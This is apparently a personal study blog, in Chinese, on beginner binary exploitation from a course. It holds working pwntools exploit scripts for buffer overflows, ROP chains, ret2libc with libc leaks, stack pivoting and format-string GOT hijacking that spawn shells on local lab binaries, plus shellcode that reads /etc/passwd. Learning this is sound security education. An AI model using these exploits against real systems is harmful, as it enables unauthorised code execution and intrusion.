Blue Whale PWN Learning

蓝鲸PWN快速入门～真的很快速。。但是在没搞懂原理的情况下debug的时候就很难受……

0x01 Basic Conception

环境搭建

sudo apt-get install nasm gcc-4.8 gdb binutils hexedit gcc-4.8-multilib

# 32位libc库
sudo apt-get install libc6-dev-i386
# qira
https://github.com/geohot/qira
# github上面那个安装方法会有问题，我后来装的是1.2版本
cd ~/ && wget -qO- https://github.com/BinaryAnalysisPlatform/qira/archive/v1.2.tar.gz | tar zx && cd qira-1.2 && ./install.sh

# 报错：ImportError: No module named ext.socketio
# 重新安装低版本flask
pip install Flask==0.10.1

# 安装完成后的测试命令
qira -s ./binary
# gdb
https://github.com/longld/peda

工具介绍

GDB

gdb -q ./***

objdump

objdump -d -M intel ./***

shellcode

# nasm
nasm a.asm -o a.o -felf32

# objcopy 删除无关elf内容，提取所需可执行内容
objcopy -O binary a.o code
# 16进制查看
xxd -i code
# 输出成头文件
xxd -i code > code.h
# 编译shellcode
gcc vul.c -o vul -m32 -zexecstack
# 通过vul执行shellcode
(cat code;cat) | ./vul

vul.c

#include<unistd.h>

/* Global buffer that receives the raw shellcode bytes read from stdin. */
char code[200];
/* Function-pointer type used to call into the buffer. */
typedef int (*CODE)();

/* Read up to 100 bytes from stdin into `code`, then call the buffer as a function. */
int main()
{
    read(0,code,100);   /* fd 0 = stdin; at most 100 of the 200 bytes are filled */
    ((CODE)code)();     /* cast the data buffer to a function pointer and jump into it */
}

-w535

函数调用

    ; Shellcode: open '/etc/passwd', read 0x30 bytes onto the stack,
    ; write them to fd 1, then exit. Uses the jmp/call/pop trick to
    ; obtain the address of the embedded path string.
    jmp file                ; jump forward so `call open` can push the string's address
open:
    pop ebx                 ; ebx = return address pushed by `call open` = address of '/etc/passwd'
    xor eax,eax             ; eax = 0
    mov al,5                ; syscall 5: open
    xor ecx,ecx             ; ecx = 0 (flags: read-only)
    int 0x80                ; open(ebx, ecx) -> eax = file descriptor

    mov ebx,eax             ; ebx = fd returned by open
    mov al,3                ; syscall 3: read (only al is written; upper eax bytes still come from the fd)
    mov ecx,esp             ; ecx = buffer = current top of stack
    mov dl,0x30             ; low byte of edx = 0x30 (48) bytes to read
                            ; NOTE(review): the upper bits of edx are never cleared in this snippet
    int 0x80                ; read(ebx, ecx, edx)

    mov al,4                ; syscall 4: write (upper eax bytes come from read's return value)
    mov bl,1                ; low byte of ebx = 1 (stdout); upper bytes still hold the old fd bits
    mov dl,0x30             ; write the same 0x30 bytes
    int 0x80                ; write(ebx, ecx, edx) -- ecx still points at the stack buffer

    xor eax,eax             ; eax = 0
    inc eax                 ; eax = 1: exit
    int 0x80                ; exit(ebx)

file:
    call open               ; pushes the address of the following bytes and jumps back to `open`
    db '/etc/passwd', 0x0   ; NUL-terminated path used as the open() argument

执行流程：
jmp file -> call open（call会把紧随其后的字符串'/etc/passwd'的地址作为返回地址压栈，0x0用于“截断”后面的字符） -> pop ebx将栈顶的这个地址pop出来赋给ebx -> 将eax异或置0 -> 将5赋给al寄存器（执行open()函数） -> 将ecx异或置0（只读） -> int 0x80 结束open()函数 -> 将eax赋给ebx（eax返回的是open()函数返回的文件描述符） -> 将3赋给al寄存器（执行read()函数） -> 将esp（栈顶地址，作为读入缓冲区）赋给ecx -> 将dl赋值0x30（read的长度） -> int 0x80结束read()函数 -> 将4赋给al寄存器（执行write()函数） -> 将1赋给bl寄存器（write到屏幕） -> 将0x30赋给dl寄存器 -> int 0x80结束write()函数 -> 将eax异或置0 -> inc eax加一，执行exit()函数 -> int 0x80结束exit()函数

Comsumption

Register Architecture

-w877

假如EAX是12345678h
那么AX就是EAX的低16位，即5678h
AL就是AX的低8位，即78h

同理EBX，ECX，EDX…… 这样就能解释上面，函数调用那里，为啥将eax异或置0之后，给al赋0x**了。

Command

MOV dst,src
add dest,src
sub dest,src
mul arg
# 自加1
inc
# 自减1
dec
cmp
push
pop

System Call

eax: system call number / return value
ebx,ecx,edx,esi,edi:argument
instruction: int 0x80

Linux Syscall Reference

0x02 Buffer overflow

Vulnerable Functions

gets
scanf
strcpy
sprintf
memcpy
strcat
……

Return to Text

这个的漏洞点也很直截了当，没有对buf做限制

// Decompiled vuln(): prints a banner, then reads up to 0x32 (50) bytes into a stack buffer.
ssize_t vuln()
{
  char buf; // [sp+1Ch] [bp-1Ch]@1 -- starts 0x1C (28) bytes below the frame pointer

  write(1, "[*]Welcome to pwn1\n", 0x13u);
  // 50 bytes are accepted but buf sits only 28 bytes below bp, so the read can run past the frame
  return read(0, &buf, 0x32u);
}

而且里面还有一个shell函数，所以直接就能上exp拿shell

exp

from pwn import *

# 32 filler bytes precede the return address in this exploit.
padding = 'a' * 32
# Return target inside the binary (presumably the built-in shell function).
ret_addr = 0x0804851D

r = remote('localhost', 4000)
r.sendline(padding + p32(ret_addr))

r.interactive()

Return to Shellcode

// Decompiled main(): reads a name into the global `name`, then reads a second line with gets().
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-14h]@1 -- stack buffer passed to gets() below

  setvbuf(stdout, 0, 2, 0);
  printf("Name:");
  read(0, &name, 0x32u);           // up to 0x32 (50) bytes go into `name` (not declared in this function)
  printf("Try your best:");
  return (int)gets((char *)&v4);   // gets() has no length limit, so input can run past v4
}

这道同样是溢出，但是没有内置shell函数，刚好看到有个定义的全局变量$name(bss段)，他的地址不会改变，所以我们就可以往他那写shellcode，然后溢出的时候return到他的地址就可以。

这里用到pwntools的asm(shellcraft.sh())：shellcraft.xx()是pwntools封装好的内置shellcode（汇编源码），asm()则负责把汇编源码汇编成机器码

exp

from pwn import *

# Address the overflow returns into; the shellcode is sent as the "Name" input.
name_addr = 0x0804a060
shellcode = asm(shellcraft.sh())
overflow = 'a' * 32 + p32(name_addr)

r = remote('localhost', 4000)

# First prompt: deliver the shellcode.
r.recvuntil('Name:')
r.sendline(shellcode)
# Second prompt: overwrite the return address.
r.recvuntil('Try your best:')
r.sendline(overflow)

r.interactive()

homework

这道题知道溢出点在gets()和strcpy()上，但是不知道怎么下手。。

// Decompiled main(): reads a line with gets() into v7, copies it into v6 with strcpy(), and echoes it.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax@1
  int result; // eax@1
  int v5; // ecx@1
  int v6; // [sp+18h] [bp-468h]@1 -- strcpy destination; 0x64 (100) bytes below v7
  int v7; // [sp+7Ch] [bp-404h]@1 -- gets destination; 0x400 (1024) bytes below v8
  int v8; // [sp+47Ch] [bp-4h]@1 -- copy of the gs:20 value, compared again before return

  v8 = *MK_FP(__GS__, 20);          // presumably the stack canary -- confirm in the disassembly
  alarm(0x3Cu);                     // 0x3C = 60
  setvbuf(stdout, 0, 2, 0);
  v3 = z();                         // z() is defined elsewhere; its result only feeds the prompt text
  printf("Echo string (less than %d bytes): ", v3 / 0x2710);
  gets((char *)&v7);                // unbounded read into v7
  strcpy((char *)&v6, (const char *)&v7);  // unbounded copy into v6, which sits below v7
  puts((const char *)&v6);
  result = 0;
  v5 = *MK_FP(__GS__, 20) ^ v8;     // non-zero if v8 was modified
  return result;
}

0x03 ROP

Return Oriented Programming(ROP)
是一种利用现有的程序片段组合出想要功能的技巧

可以使用ROP解除DEP限制，然后执行shellcode
可以使用ROP绕过ASLR限制
可以使用ROP绕过StackGuard
可以使用ROP绕过PIE

使用ROP的关键

查找gadget
排列gadget

ROP类型

控制寄存器做syscall
使用原有程序里的function
使用libc里的gadget或function(绕过ASLR)

查找ROP
ROPGadget

ROPgadget --binary ./rop
ROPgadget --binary ./rop --opcode cd80c3
cd80c3 // int 0x80 ; ret

ASLR

Address Space Layout Randomization 地址随机化
检查是否开启ASLR
cat /proc/sys/kernel/randomize_va_space

DEP

Data Execution Prevention (NX)
可写的不可以执行，可执行的不可以写

homework1

这个跟视频里讲的rop例子是一样的，只是把pop ecx和pop ebx放到了一块赋值。所以基本上没有什么难点，自己敲一遍就理解了。
-w1611
payload

from pwn import *

# Gadget addresses inside the target binary.
pop_eax_ret = 0x080bae06
pop_ecx_ebx_ret = 0x0806e851
pop_edx_ret = 0x0806e82a
int_0x80_ret = 0x0806eef0
# Scratch address that receives the '/bin/sh' string.
buf = 0x80eb000 - 100


def _syscall_chain(eax, ebx, ecx, edx):
    """Return the ROP words that load the four registers and run `int 0x80`."""
    return [
        pop_eax_ret, eax,
        pop_ecx_ebx_ret, ecx, ebx,   # the gadget pops ecx first, then ebx
        pop_edx_ret, edx,
        int_0x80_ret,
    ]


# Stage 1: syscall 3 (read) pulls up to 50 bytes from fd 0 into buf.
# Stage 2: syscall 0xb runs the path that stage 1 stored at buf.
rop = _syscall_chain(3, 0, buf, 50) + _syscall_chain(0xb, buf, 0, 0)

r = remote('localhost', 4000)
r.recvuntil('Your input :')
r.sendline('a'*32 + flat(rop))
# Give the target time to reach the read syscall before sending its input.
sleep(2)
r.sendline('/bin/sh\x00')
r.interactive()

有两个小疑问就是

出入栈的原理，为什么pop出来之后return相当于复制操作
真实环境中第一次手动sendline之后程序就退出了，为啥脚本里还能sendline第二次

Answer：

看汇编去！
因为第一次写入了read函数，从屏幕中获取输入写入buf中，后面才能exec

PIE

Position Independent Executable
地址无关可执行文件

StackGuard

编译器对stack overflow的一种保护机制，在函数被调用时，先在stack上放canary，函数返回前先检查这个值有没有被修改，可以有效的防止缓冲区溢出攻击

Return to Library

Lazy Binding

PLT
GOT(Global Offset Table) 全局偏移表
.got 保存全局变量的地址
.got.plt保存函数引用地址

-w629

ret2lib

这个类型的考点关键在于得到基地址，知道了基地址就可以用readelf去获取所用函数的偏移地址，然后再找个可写的地址，构造rop，传进去即可。

ldd ./** 查看程序调用了哪个libc库
readelf -a /lib32/libc.so.6 | grep puts@ 查找libc库某函数的偏移地址
pwntools ELF Files
gdb run之后输入bt就可以看到libc库的地址 Linux中用gdb 查看代码堆栈的信息

查看找的偏移地址是否正确可以对照libc库中后1.5个byte的da0

readelf查找偏移
-w731
pwntools
-w724

payload

from pwn import *

# Load the libc used for symbol offset lookups
libc = ELF('/lib32/libc.so.6')

r = remote('localhost', 4000)


# GOT slot of puts in the target and the offset of puts inside libc
puts_got_plt = 0x804a01c
puts_off = 0x005f140


r.recvuntil(':')
r.sendline(str(puts_got_plt))
r.recvuntil(':')
# base address = leaked runtime address - offset inside libc
libc_base = int(r.recvuntil('\n').strip(), 16) - puts_off

# Single-argument parenthesised form prints the same text under Python 2
print('Libc Base Addr : ' + hex(libc_base))

# Function offsets found with readelf (kept for reference)
# gets_off = 0x005e890
# system_off = 0x003a940
# gets = libc_base + gets_off
# system = libc_base + system_off

# Function offsets looked up through pwntools; the symbol values are
# added directly, with no hex()/int() round-trip.
gets = libc_base + libc.symbols['gets']
system = libc_base + libc.symbols['system']
buf = 0x804b000 - 100
# gets(buf) returns into system(buf): each call sees the next word as its
# return address and the word after that as its argument.
rop = [
    gets,
    system,
    buf,
    buf,
]
r.sendline('a'*60 + flat(rop))
# Wait for the target to reach gets() before sending the command string
sleep(2)
r.sendline('/bin/sh\x00')


r.interactive()

payload2
自己通过write() / puts()寻找函数实际地址，计算基地址
-w724

from pwn import *

# Two-stage ret2libc: stage 1 leaks a libc address with write() and returns
# to main; stage 2 overflows again with gets(buf) -> system(buf).
context.log_level='debug'
r = remote('localhost', 4000)
pwnme = ELF('./pwnme')
libc = ELF('/lib32/libc.so.6')

# GOT slot of __libc_start_main in the target, and that symbol's offset inside libc
libc_start_main_got = pwnme.got['__libc_start_main']
libc_offset = libc.symbols['__libc_start_main']
write = pwnme.symbols['write']
main = 0x804847D
buf = 0x804b000 - 100
# Stage 1 chain: write(1, libc_start_main_got, 50), returning to main afterwards
rop = [
    write,
    main,
    1,
    libc_start_main_got,
    50,
]
# Consume the two lines the target prints before reading input
print r.readline(), r.readline()
r.sendline('a'*20 + flat(rop))
# Debug helper used to locate the leaked address inside the reply:
#r.recvline()
#tmp = r.recvline()
# print len(tmp)
#for i in range(len(tmp)):
#   print(hex(u32(tmp[i:i+4])))
# The first 4 bytes of the reply are the leaked address.
# NOTE(review): recvline() stops at the first '\n' byte, so a leak containing 0x0a would be cut short -- confirm
libc_base = u32(r.recvline()[0:4]) - libc_offset
# Values observed in earlier runs:
# libc_base = 0xf660a000
# libc_base = 0xf6622540 - libc_offset
print 'Libc base addr : ' + hex(libc_base)
gets = libc_base + libc.symbols['gets']
system = libc_base + libc.symbols['system']
# Stage 2 chain: gets(buf) returns into system(buf)
rop2 = [
    gets,
    system,
    buf,
    buf
]
# main runs again, so consume its two output lines a second time
print r.readline(), r.readline()
r.sendline('a'*20 + flat(rop2))
# Wait for the target to reach gets() before sending the command string
sleep(2)
r.sendline('/bin/sh\x00')

r.interactive()

这道题是分两次执行的，第一次write出base地址，然后第二次在脚本里面写死base地址，再传进去。拿shell。一直想调一步执行，但是遇到各种蜜汁问题。。。基础不牢地动山摇，根本不会debug就很难受。。先放一放。。

Stack Migration

homework

这个调了半天有bug，基地址也是对的，但是就是拿不到shell，然后一步步debug，差点就自闭了，结果发现pop_ebp_ret的地址复制错了。。看来又是一个细心活，不能急，不然就是一步错，“步步错”！
-w730

from pwn import *

# Stack-migration exploit: rop1 leaks a libc address, reads a second chain
# into buf1 and moves the stack there; rop2 then runs gets(buf2) -> system(buf2).
r = remote('localhost', 4000)

pwn1 = ELF('./pwn1')
libc = ELF('/lib32/libc.so.6')
# GOT slot of __libc_start_main in the target
libc_start_main_got = pwn1.got['__libc_start_main']
# Offset of __libc_start_main inside libc
libc_start_off = libc.symbols['__libc_start_main']

puts = pwn1.symbols['puts']
read = pwn1.symbols['read']
buf1 = 0x804b000 - 100
# Gadget addresses; behaviour is inferred from the names -- verify against the binary
pop_ebp_ret = 0x0804865f
pop3_ret = 0x0804865d
leave_ret = 0x080484b8

rop1 = [
    puts,                   # puts(libc_start_main_got): leak the resolved address
    pop_ebp_ret,            # return here; drops the single puts argument
    libc_start_main_got,
    read,                   # read(0, buf1, 50): receive rop2 into buf1
    pop3_ret,               # return here; drops the three read arguments
    0,
    buf1,
    50,
    pop_ebp_ret,            # load ebp with buf1 - 4 ...
    buf1 - 4,
    leave_ret               # ... so that leave/ret continues executing from buf1
]

r.recvuntil(':')
r.sendline('a'*140 + flat(rop1))
r.recvline()
r.recvline()
# Debug helper used to locate the leaked address inside the reply:
# tmp = r.recvline()
# for i in range(len(tmp)):
#     print(hex(u32(tmp[i:i+4])))
# NOTE(review): bytes 71..74 of this line are taken as the leaked address; the offset depends on the target's exact output
libc_base = u32(r.recvline()[71:75]) - libc_start_off
# Value observed in an earlier run:
# libc_base = 0xf6622540 - libc_start_off
print 'Libc base addr : ' + hex(libc_base)

gets = libc_base + libc.symbols['gets']
system = libc_base + libc.symbols['system']
buf2 = 0x804b000 - 500

# Second chain, consumed by the read() call queued in rop1
rop2 = [
    gets,
    system,
    buf2,
    buf2
]
r.sendline(flat(rop2))
# Wait for the target to reach gets() before sending the command string
sleep(2)
r.sendline('/bin/sh\x00')
r.interactive()

Patch

改16进制
sed -i s/待替换的字符/替换的字符/g ./pwn1

hook

0x04 Format String Attack

Format string 可以被攻击者的输入任意控制，而printf本身不检查后面有几个参数。

使用 %x 会造成栈上的信息泄露
可以使用 $ 来控制leak的位置

Use fmt

%N$x 打印地址
%N$hhd 打印byte
%N$s 打印str

Read from arbitrary memory

from pwn import *

# Address of the value to leak.
password = 0x804A048
# The address comes first so that %10$s dereferences it; the '#' marks
# delimit the leaked bytes in the reply.
leak_fmt = p32(password) + '#' + '%10$s' + '#'

r = remote('localhost', 4000)
r.recvuntil('?')
r.sendline(leak_fmt)

# Skip everything up to the first marker, then grab the bytes before the second.
r.recvuntil('#')
leaked = r.recvuntil('#')
pwd = u32(leaked[:4])

sleep(2)
# Send the leaked value back as a decimal string.
r.sendline(str(pwd))
r.interactive()

Write to arbitrary memory

掌握fmtstr_payload()的用法

from pwn import *

# Target address and the value to store there.
x_addr = 0x804a02c
writes = {x_addr: 0x14368792}
# 7 is the format-string argument offset used for this target.
payload = fmtstr_payload(7, writes)

r = remote('localhost', 4000)
r.sendline(payload)

r.interactive()

GOT Hijacking

综合利用：
使用任意地址读取，获取当前函数的实际地址，从而获取libc基地址
利用libc基地址+偏移地址可以知道其他函数地址
利用任意地址写入，从而配合got hijacking更改已有函数地址

payload

from pwn import *

r = remote('localhost', 4000)
fmt = ELF('./fmt1')
libc = ELF('/lib32/libc.so.6')

# Step 1: leak the resolved __libc_start_main address via %5$s.
libc_start_got = fmt.got['__libc_start_main']
libc_off = libc.symbols['__libc_start_main']
leak_fmt = p32(libc_start_got) + '#' + '%5$s' + '#'

r.sendline(leak_fmt)
r.recvuntil('#')
leaked = r.recvuntil('#')
libc_base = u32(leaked[:4]) - libc_off
print('Libc base addr : ' + hex(libc_base))

# Step 2: overwrite printf's GOT entry with the address of system.
printf_got = fmt.got['printf']
system = libc_base + libc.symbols['system']
hijack = fmtstr_payload(5, {printf_got: system})

r.sendline(hijack)
r.interactive()

0x05 Summary

未涉及的：
64bit程序、Canary保护、无libc情况、Heap exploit

Course:
Modern Binary Exploitation

0aKarma

blog